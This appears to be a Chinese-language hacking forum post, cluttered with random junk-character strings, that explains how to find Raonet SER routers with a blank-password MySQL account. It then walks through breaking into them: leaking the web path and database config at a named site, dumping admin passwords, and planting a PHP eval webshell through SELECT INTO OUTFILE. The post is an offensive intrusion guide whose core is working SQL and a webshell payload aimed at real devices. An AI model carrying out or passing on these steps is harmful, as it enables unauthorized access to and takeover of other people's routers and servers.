寻找存在漏洞的路由器方法:
; }1 T+ b( i( G
5 A8 x+ C4 i- ^4 m- F1:google搜索'Raonet Subscriber Ethernet Router', p& x: ?/ h4 \/ U1 q
/ A0 {5 c5 ^( T- Q$ `) \$ d$ f2 m
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001- u: D% j4 a; M' F7 s
: w7 i: R! ~- n+ l
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
1 ]3 e3 F. m- ?
4 ]3 b" x( O$ o: [; q//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......8 V; _9 ^0 @! B# w
: a7 O: p# b5 k& g+ A $ l, P% p# q" N
2 D2 g+ u' o) H, P入侵步骤:
: A+ q* A* k* \2 D* V
! y- L: K& p$ D% l l1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
( Q: t5 }8 m& }& }
' m6 x, F# H9 B: D2 T% X; ~2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
: p, R& F' h5 }$ z! u7 w o' G3:得到密码后连接,查看GUI管理密码:
( l3 [% K& J+ j" ?+ M6 K3 z3 c( l) ~use ser_500
# {3 `( i$ Y, B, U; ^3 e; l) F# U! zselect id,passwd from user;9 }! i. V( X" g* _$ J( w
4:通过数据库写入webshell,执行命令:( _7 X6 W3 D0 |- @; I. T" S
use mysql;: ^3 R, Z9 ^( J- `; S( a5 o
create table ok(cmd TEXT);
6 ]2 Z- d) Z+ r5 F4 I: Einsert into ok values("<?php @eval($_POST[cmd])?>");( C; Z! W: N& X. a. \- ]; G
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
! F7 J' i/ a1 W8 I" Kdrop table ok;
* J ` B# ]% S V" m% j E) Y3 A8 l& Y* B) @2 {) S- z0 j0 W4 Q
5:连接后门shell.php
# m) A! o7 H0 Q$ Z$ p3 V, J* U A
6 Z: V$ D6 ]6 p1 i; r8 a+ K5 B6. 搞定!( D$ m [! F; k- }1 x
/ O3 W* b: m* P( N/ c2 L |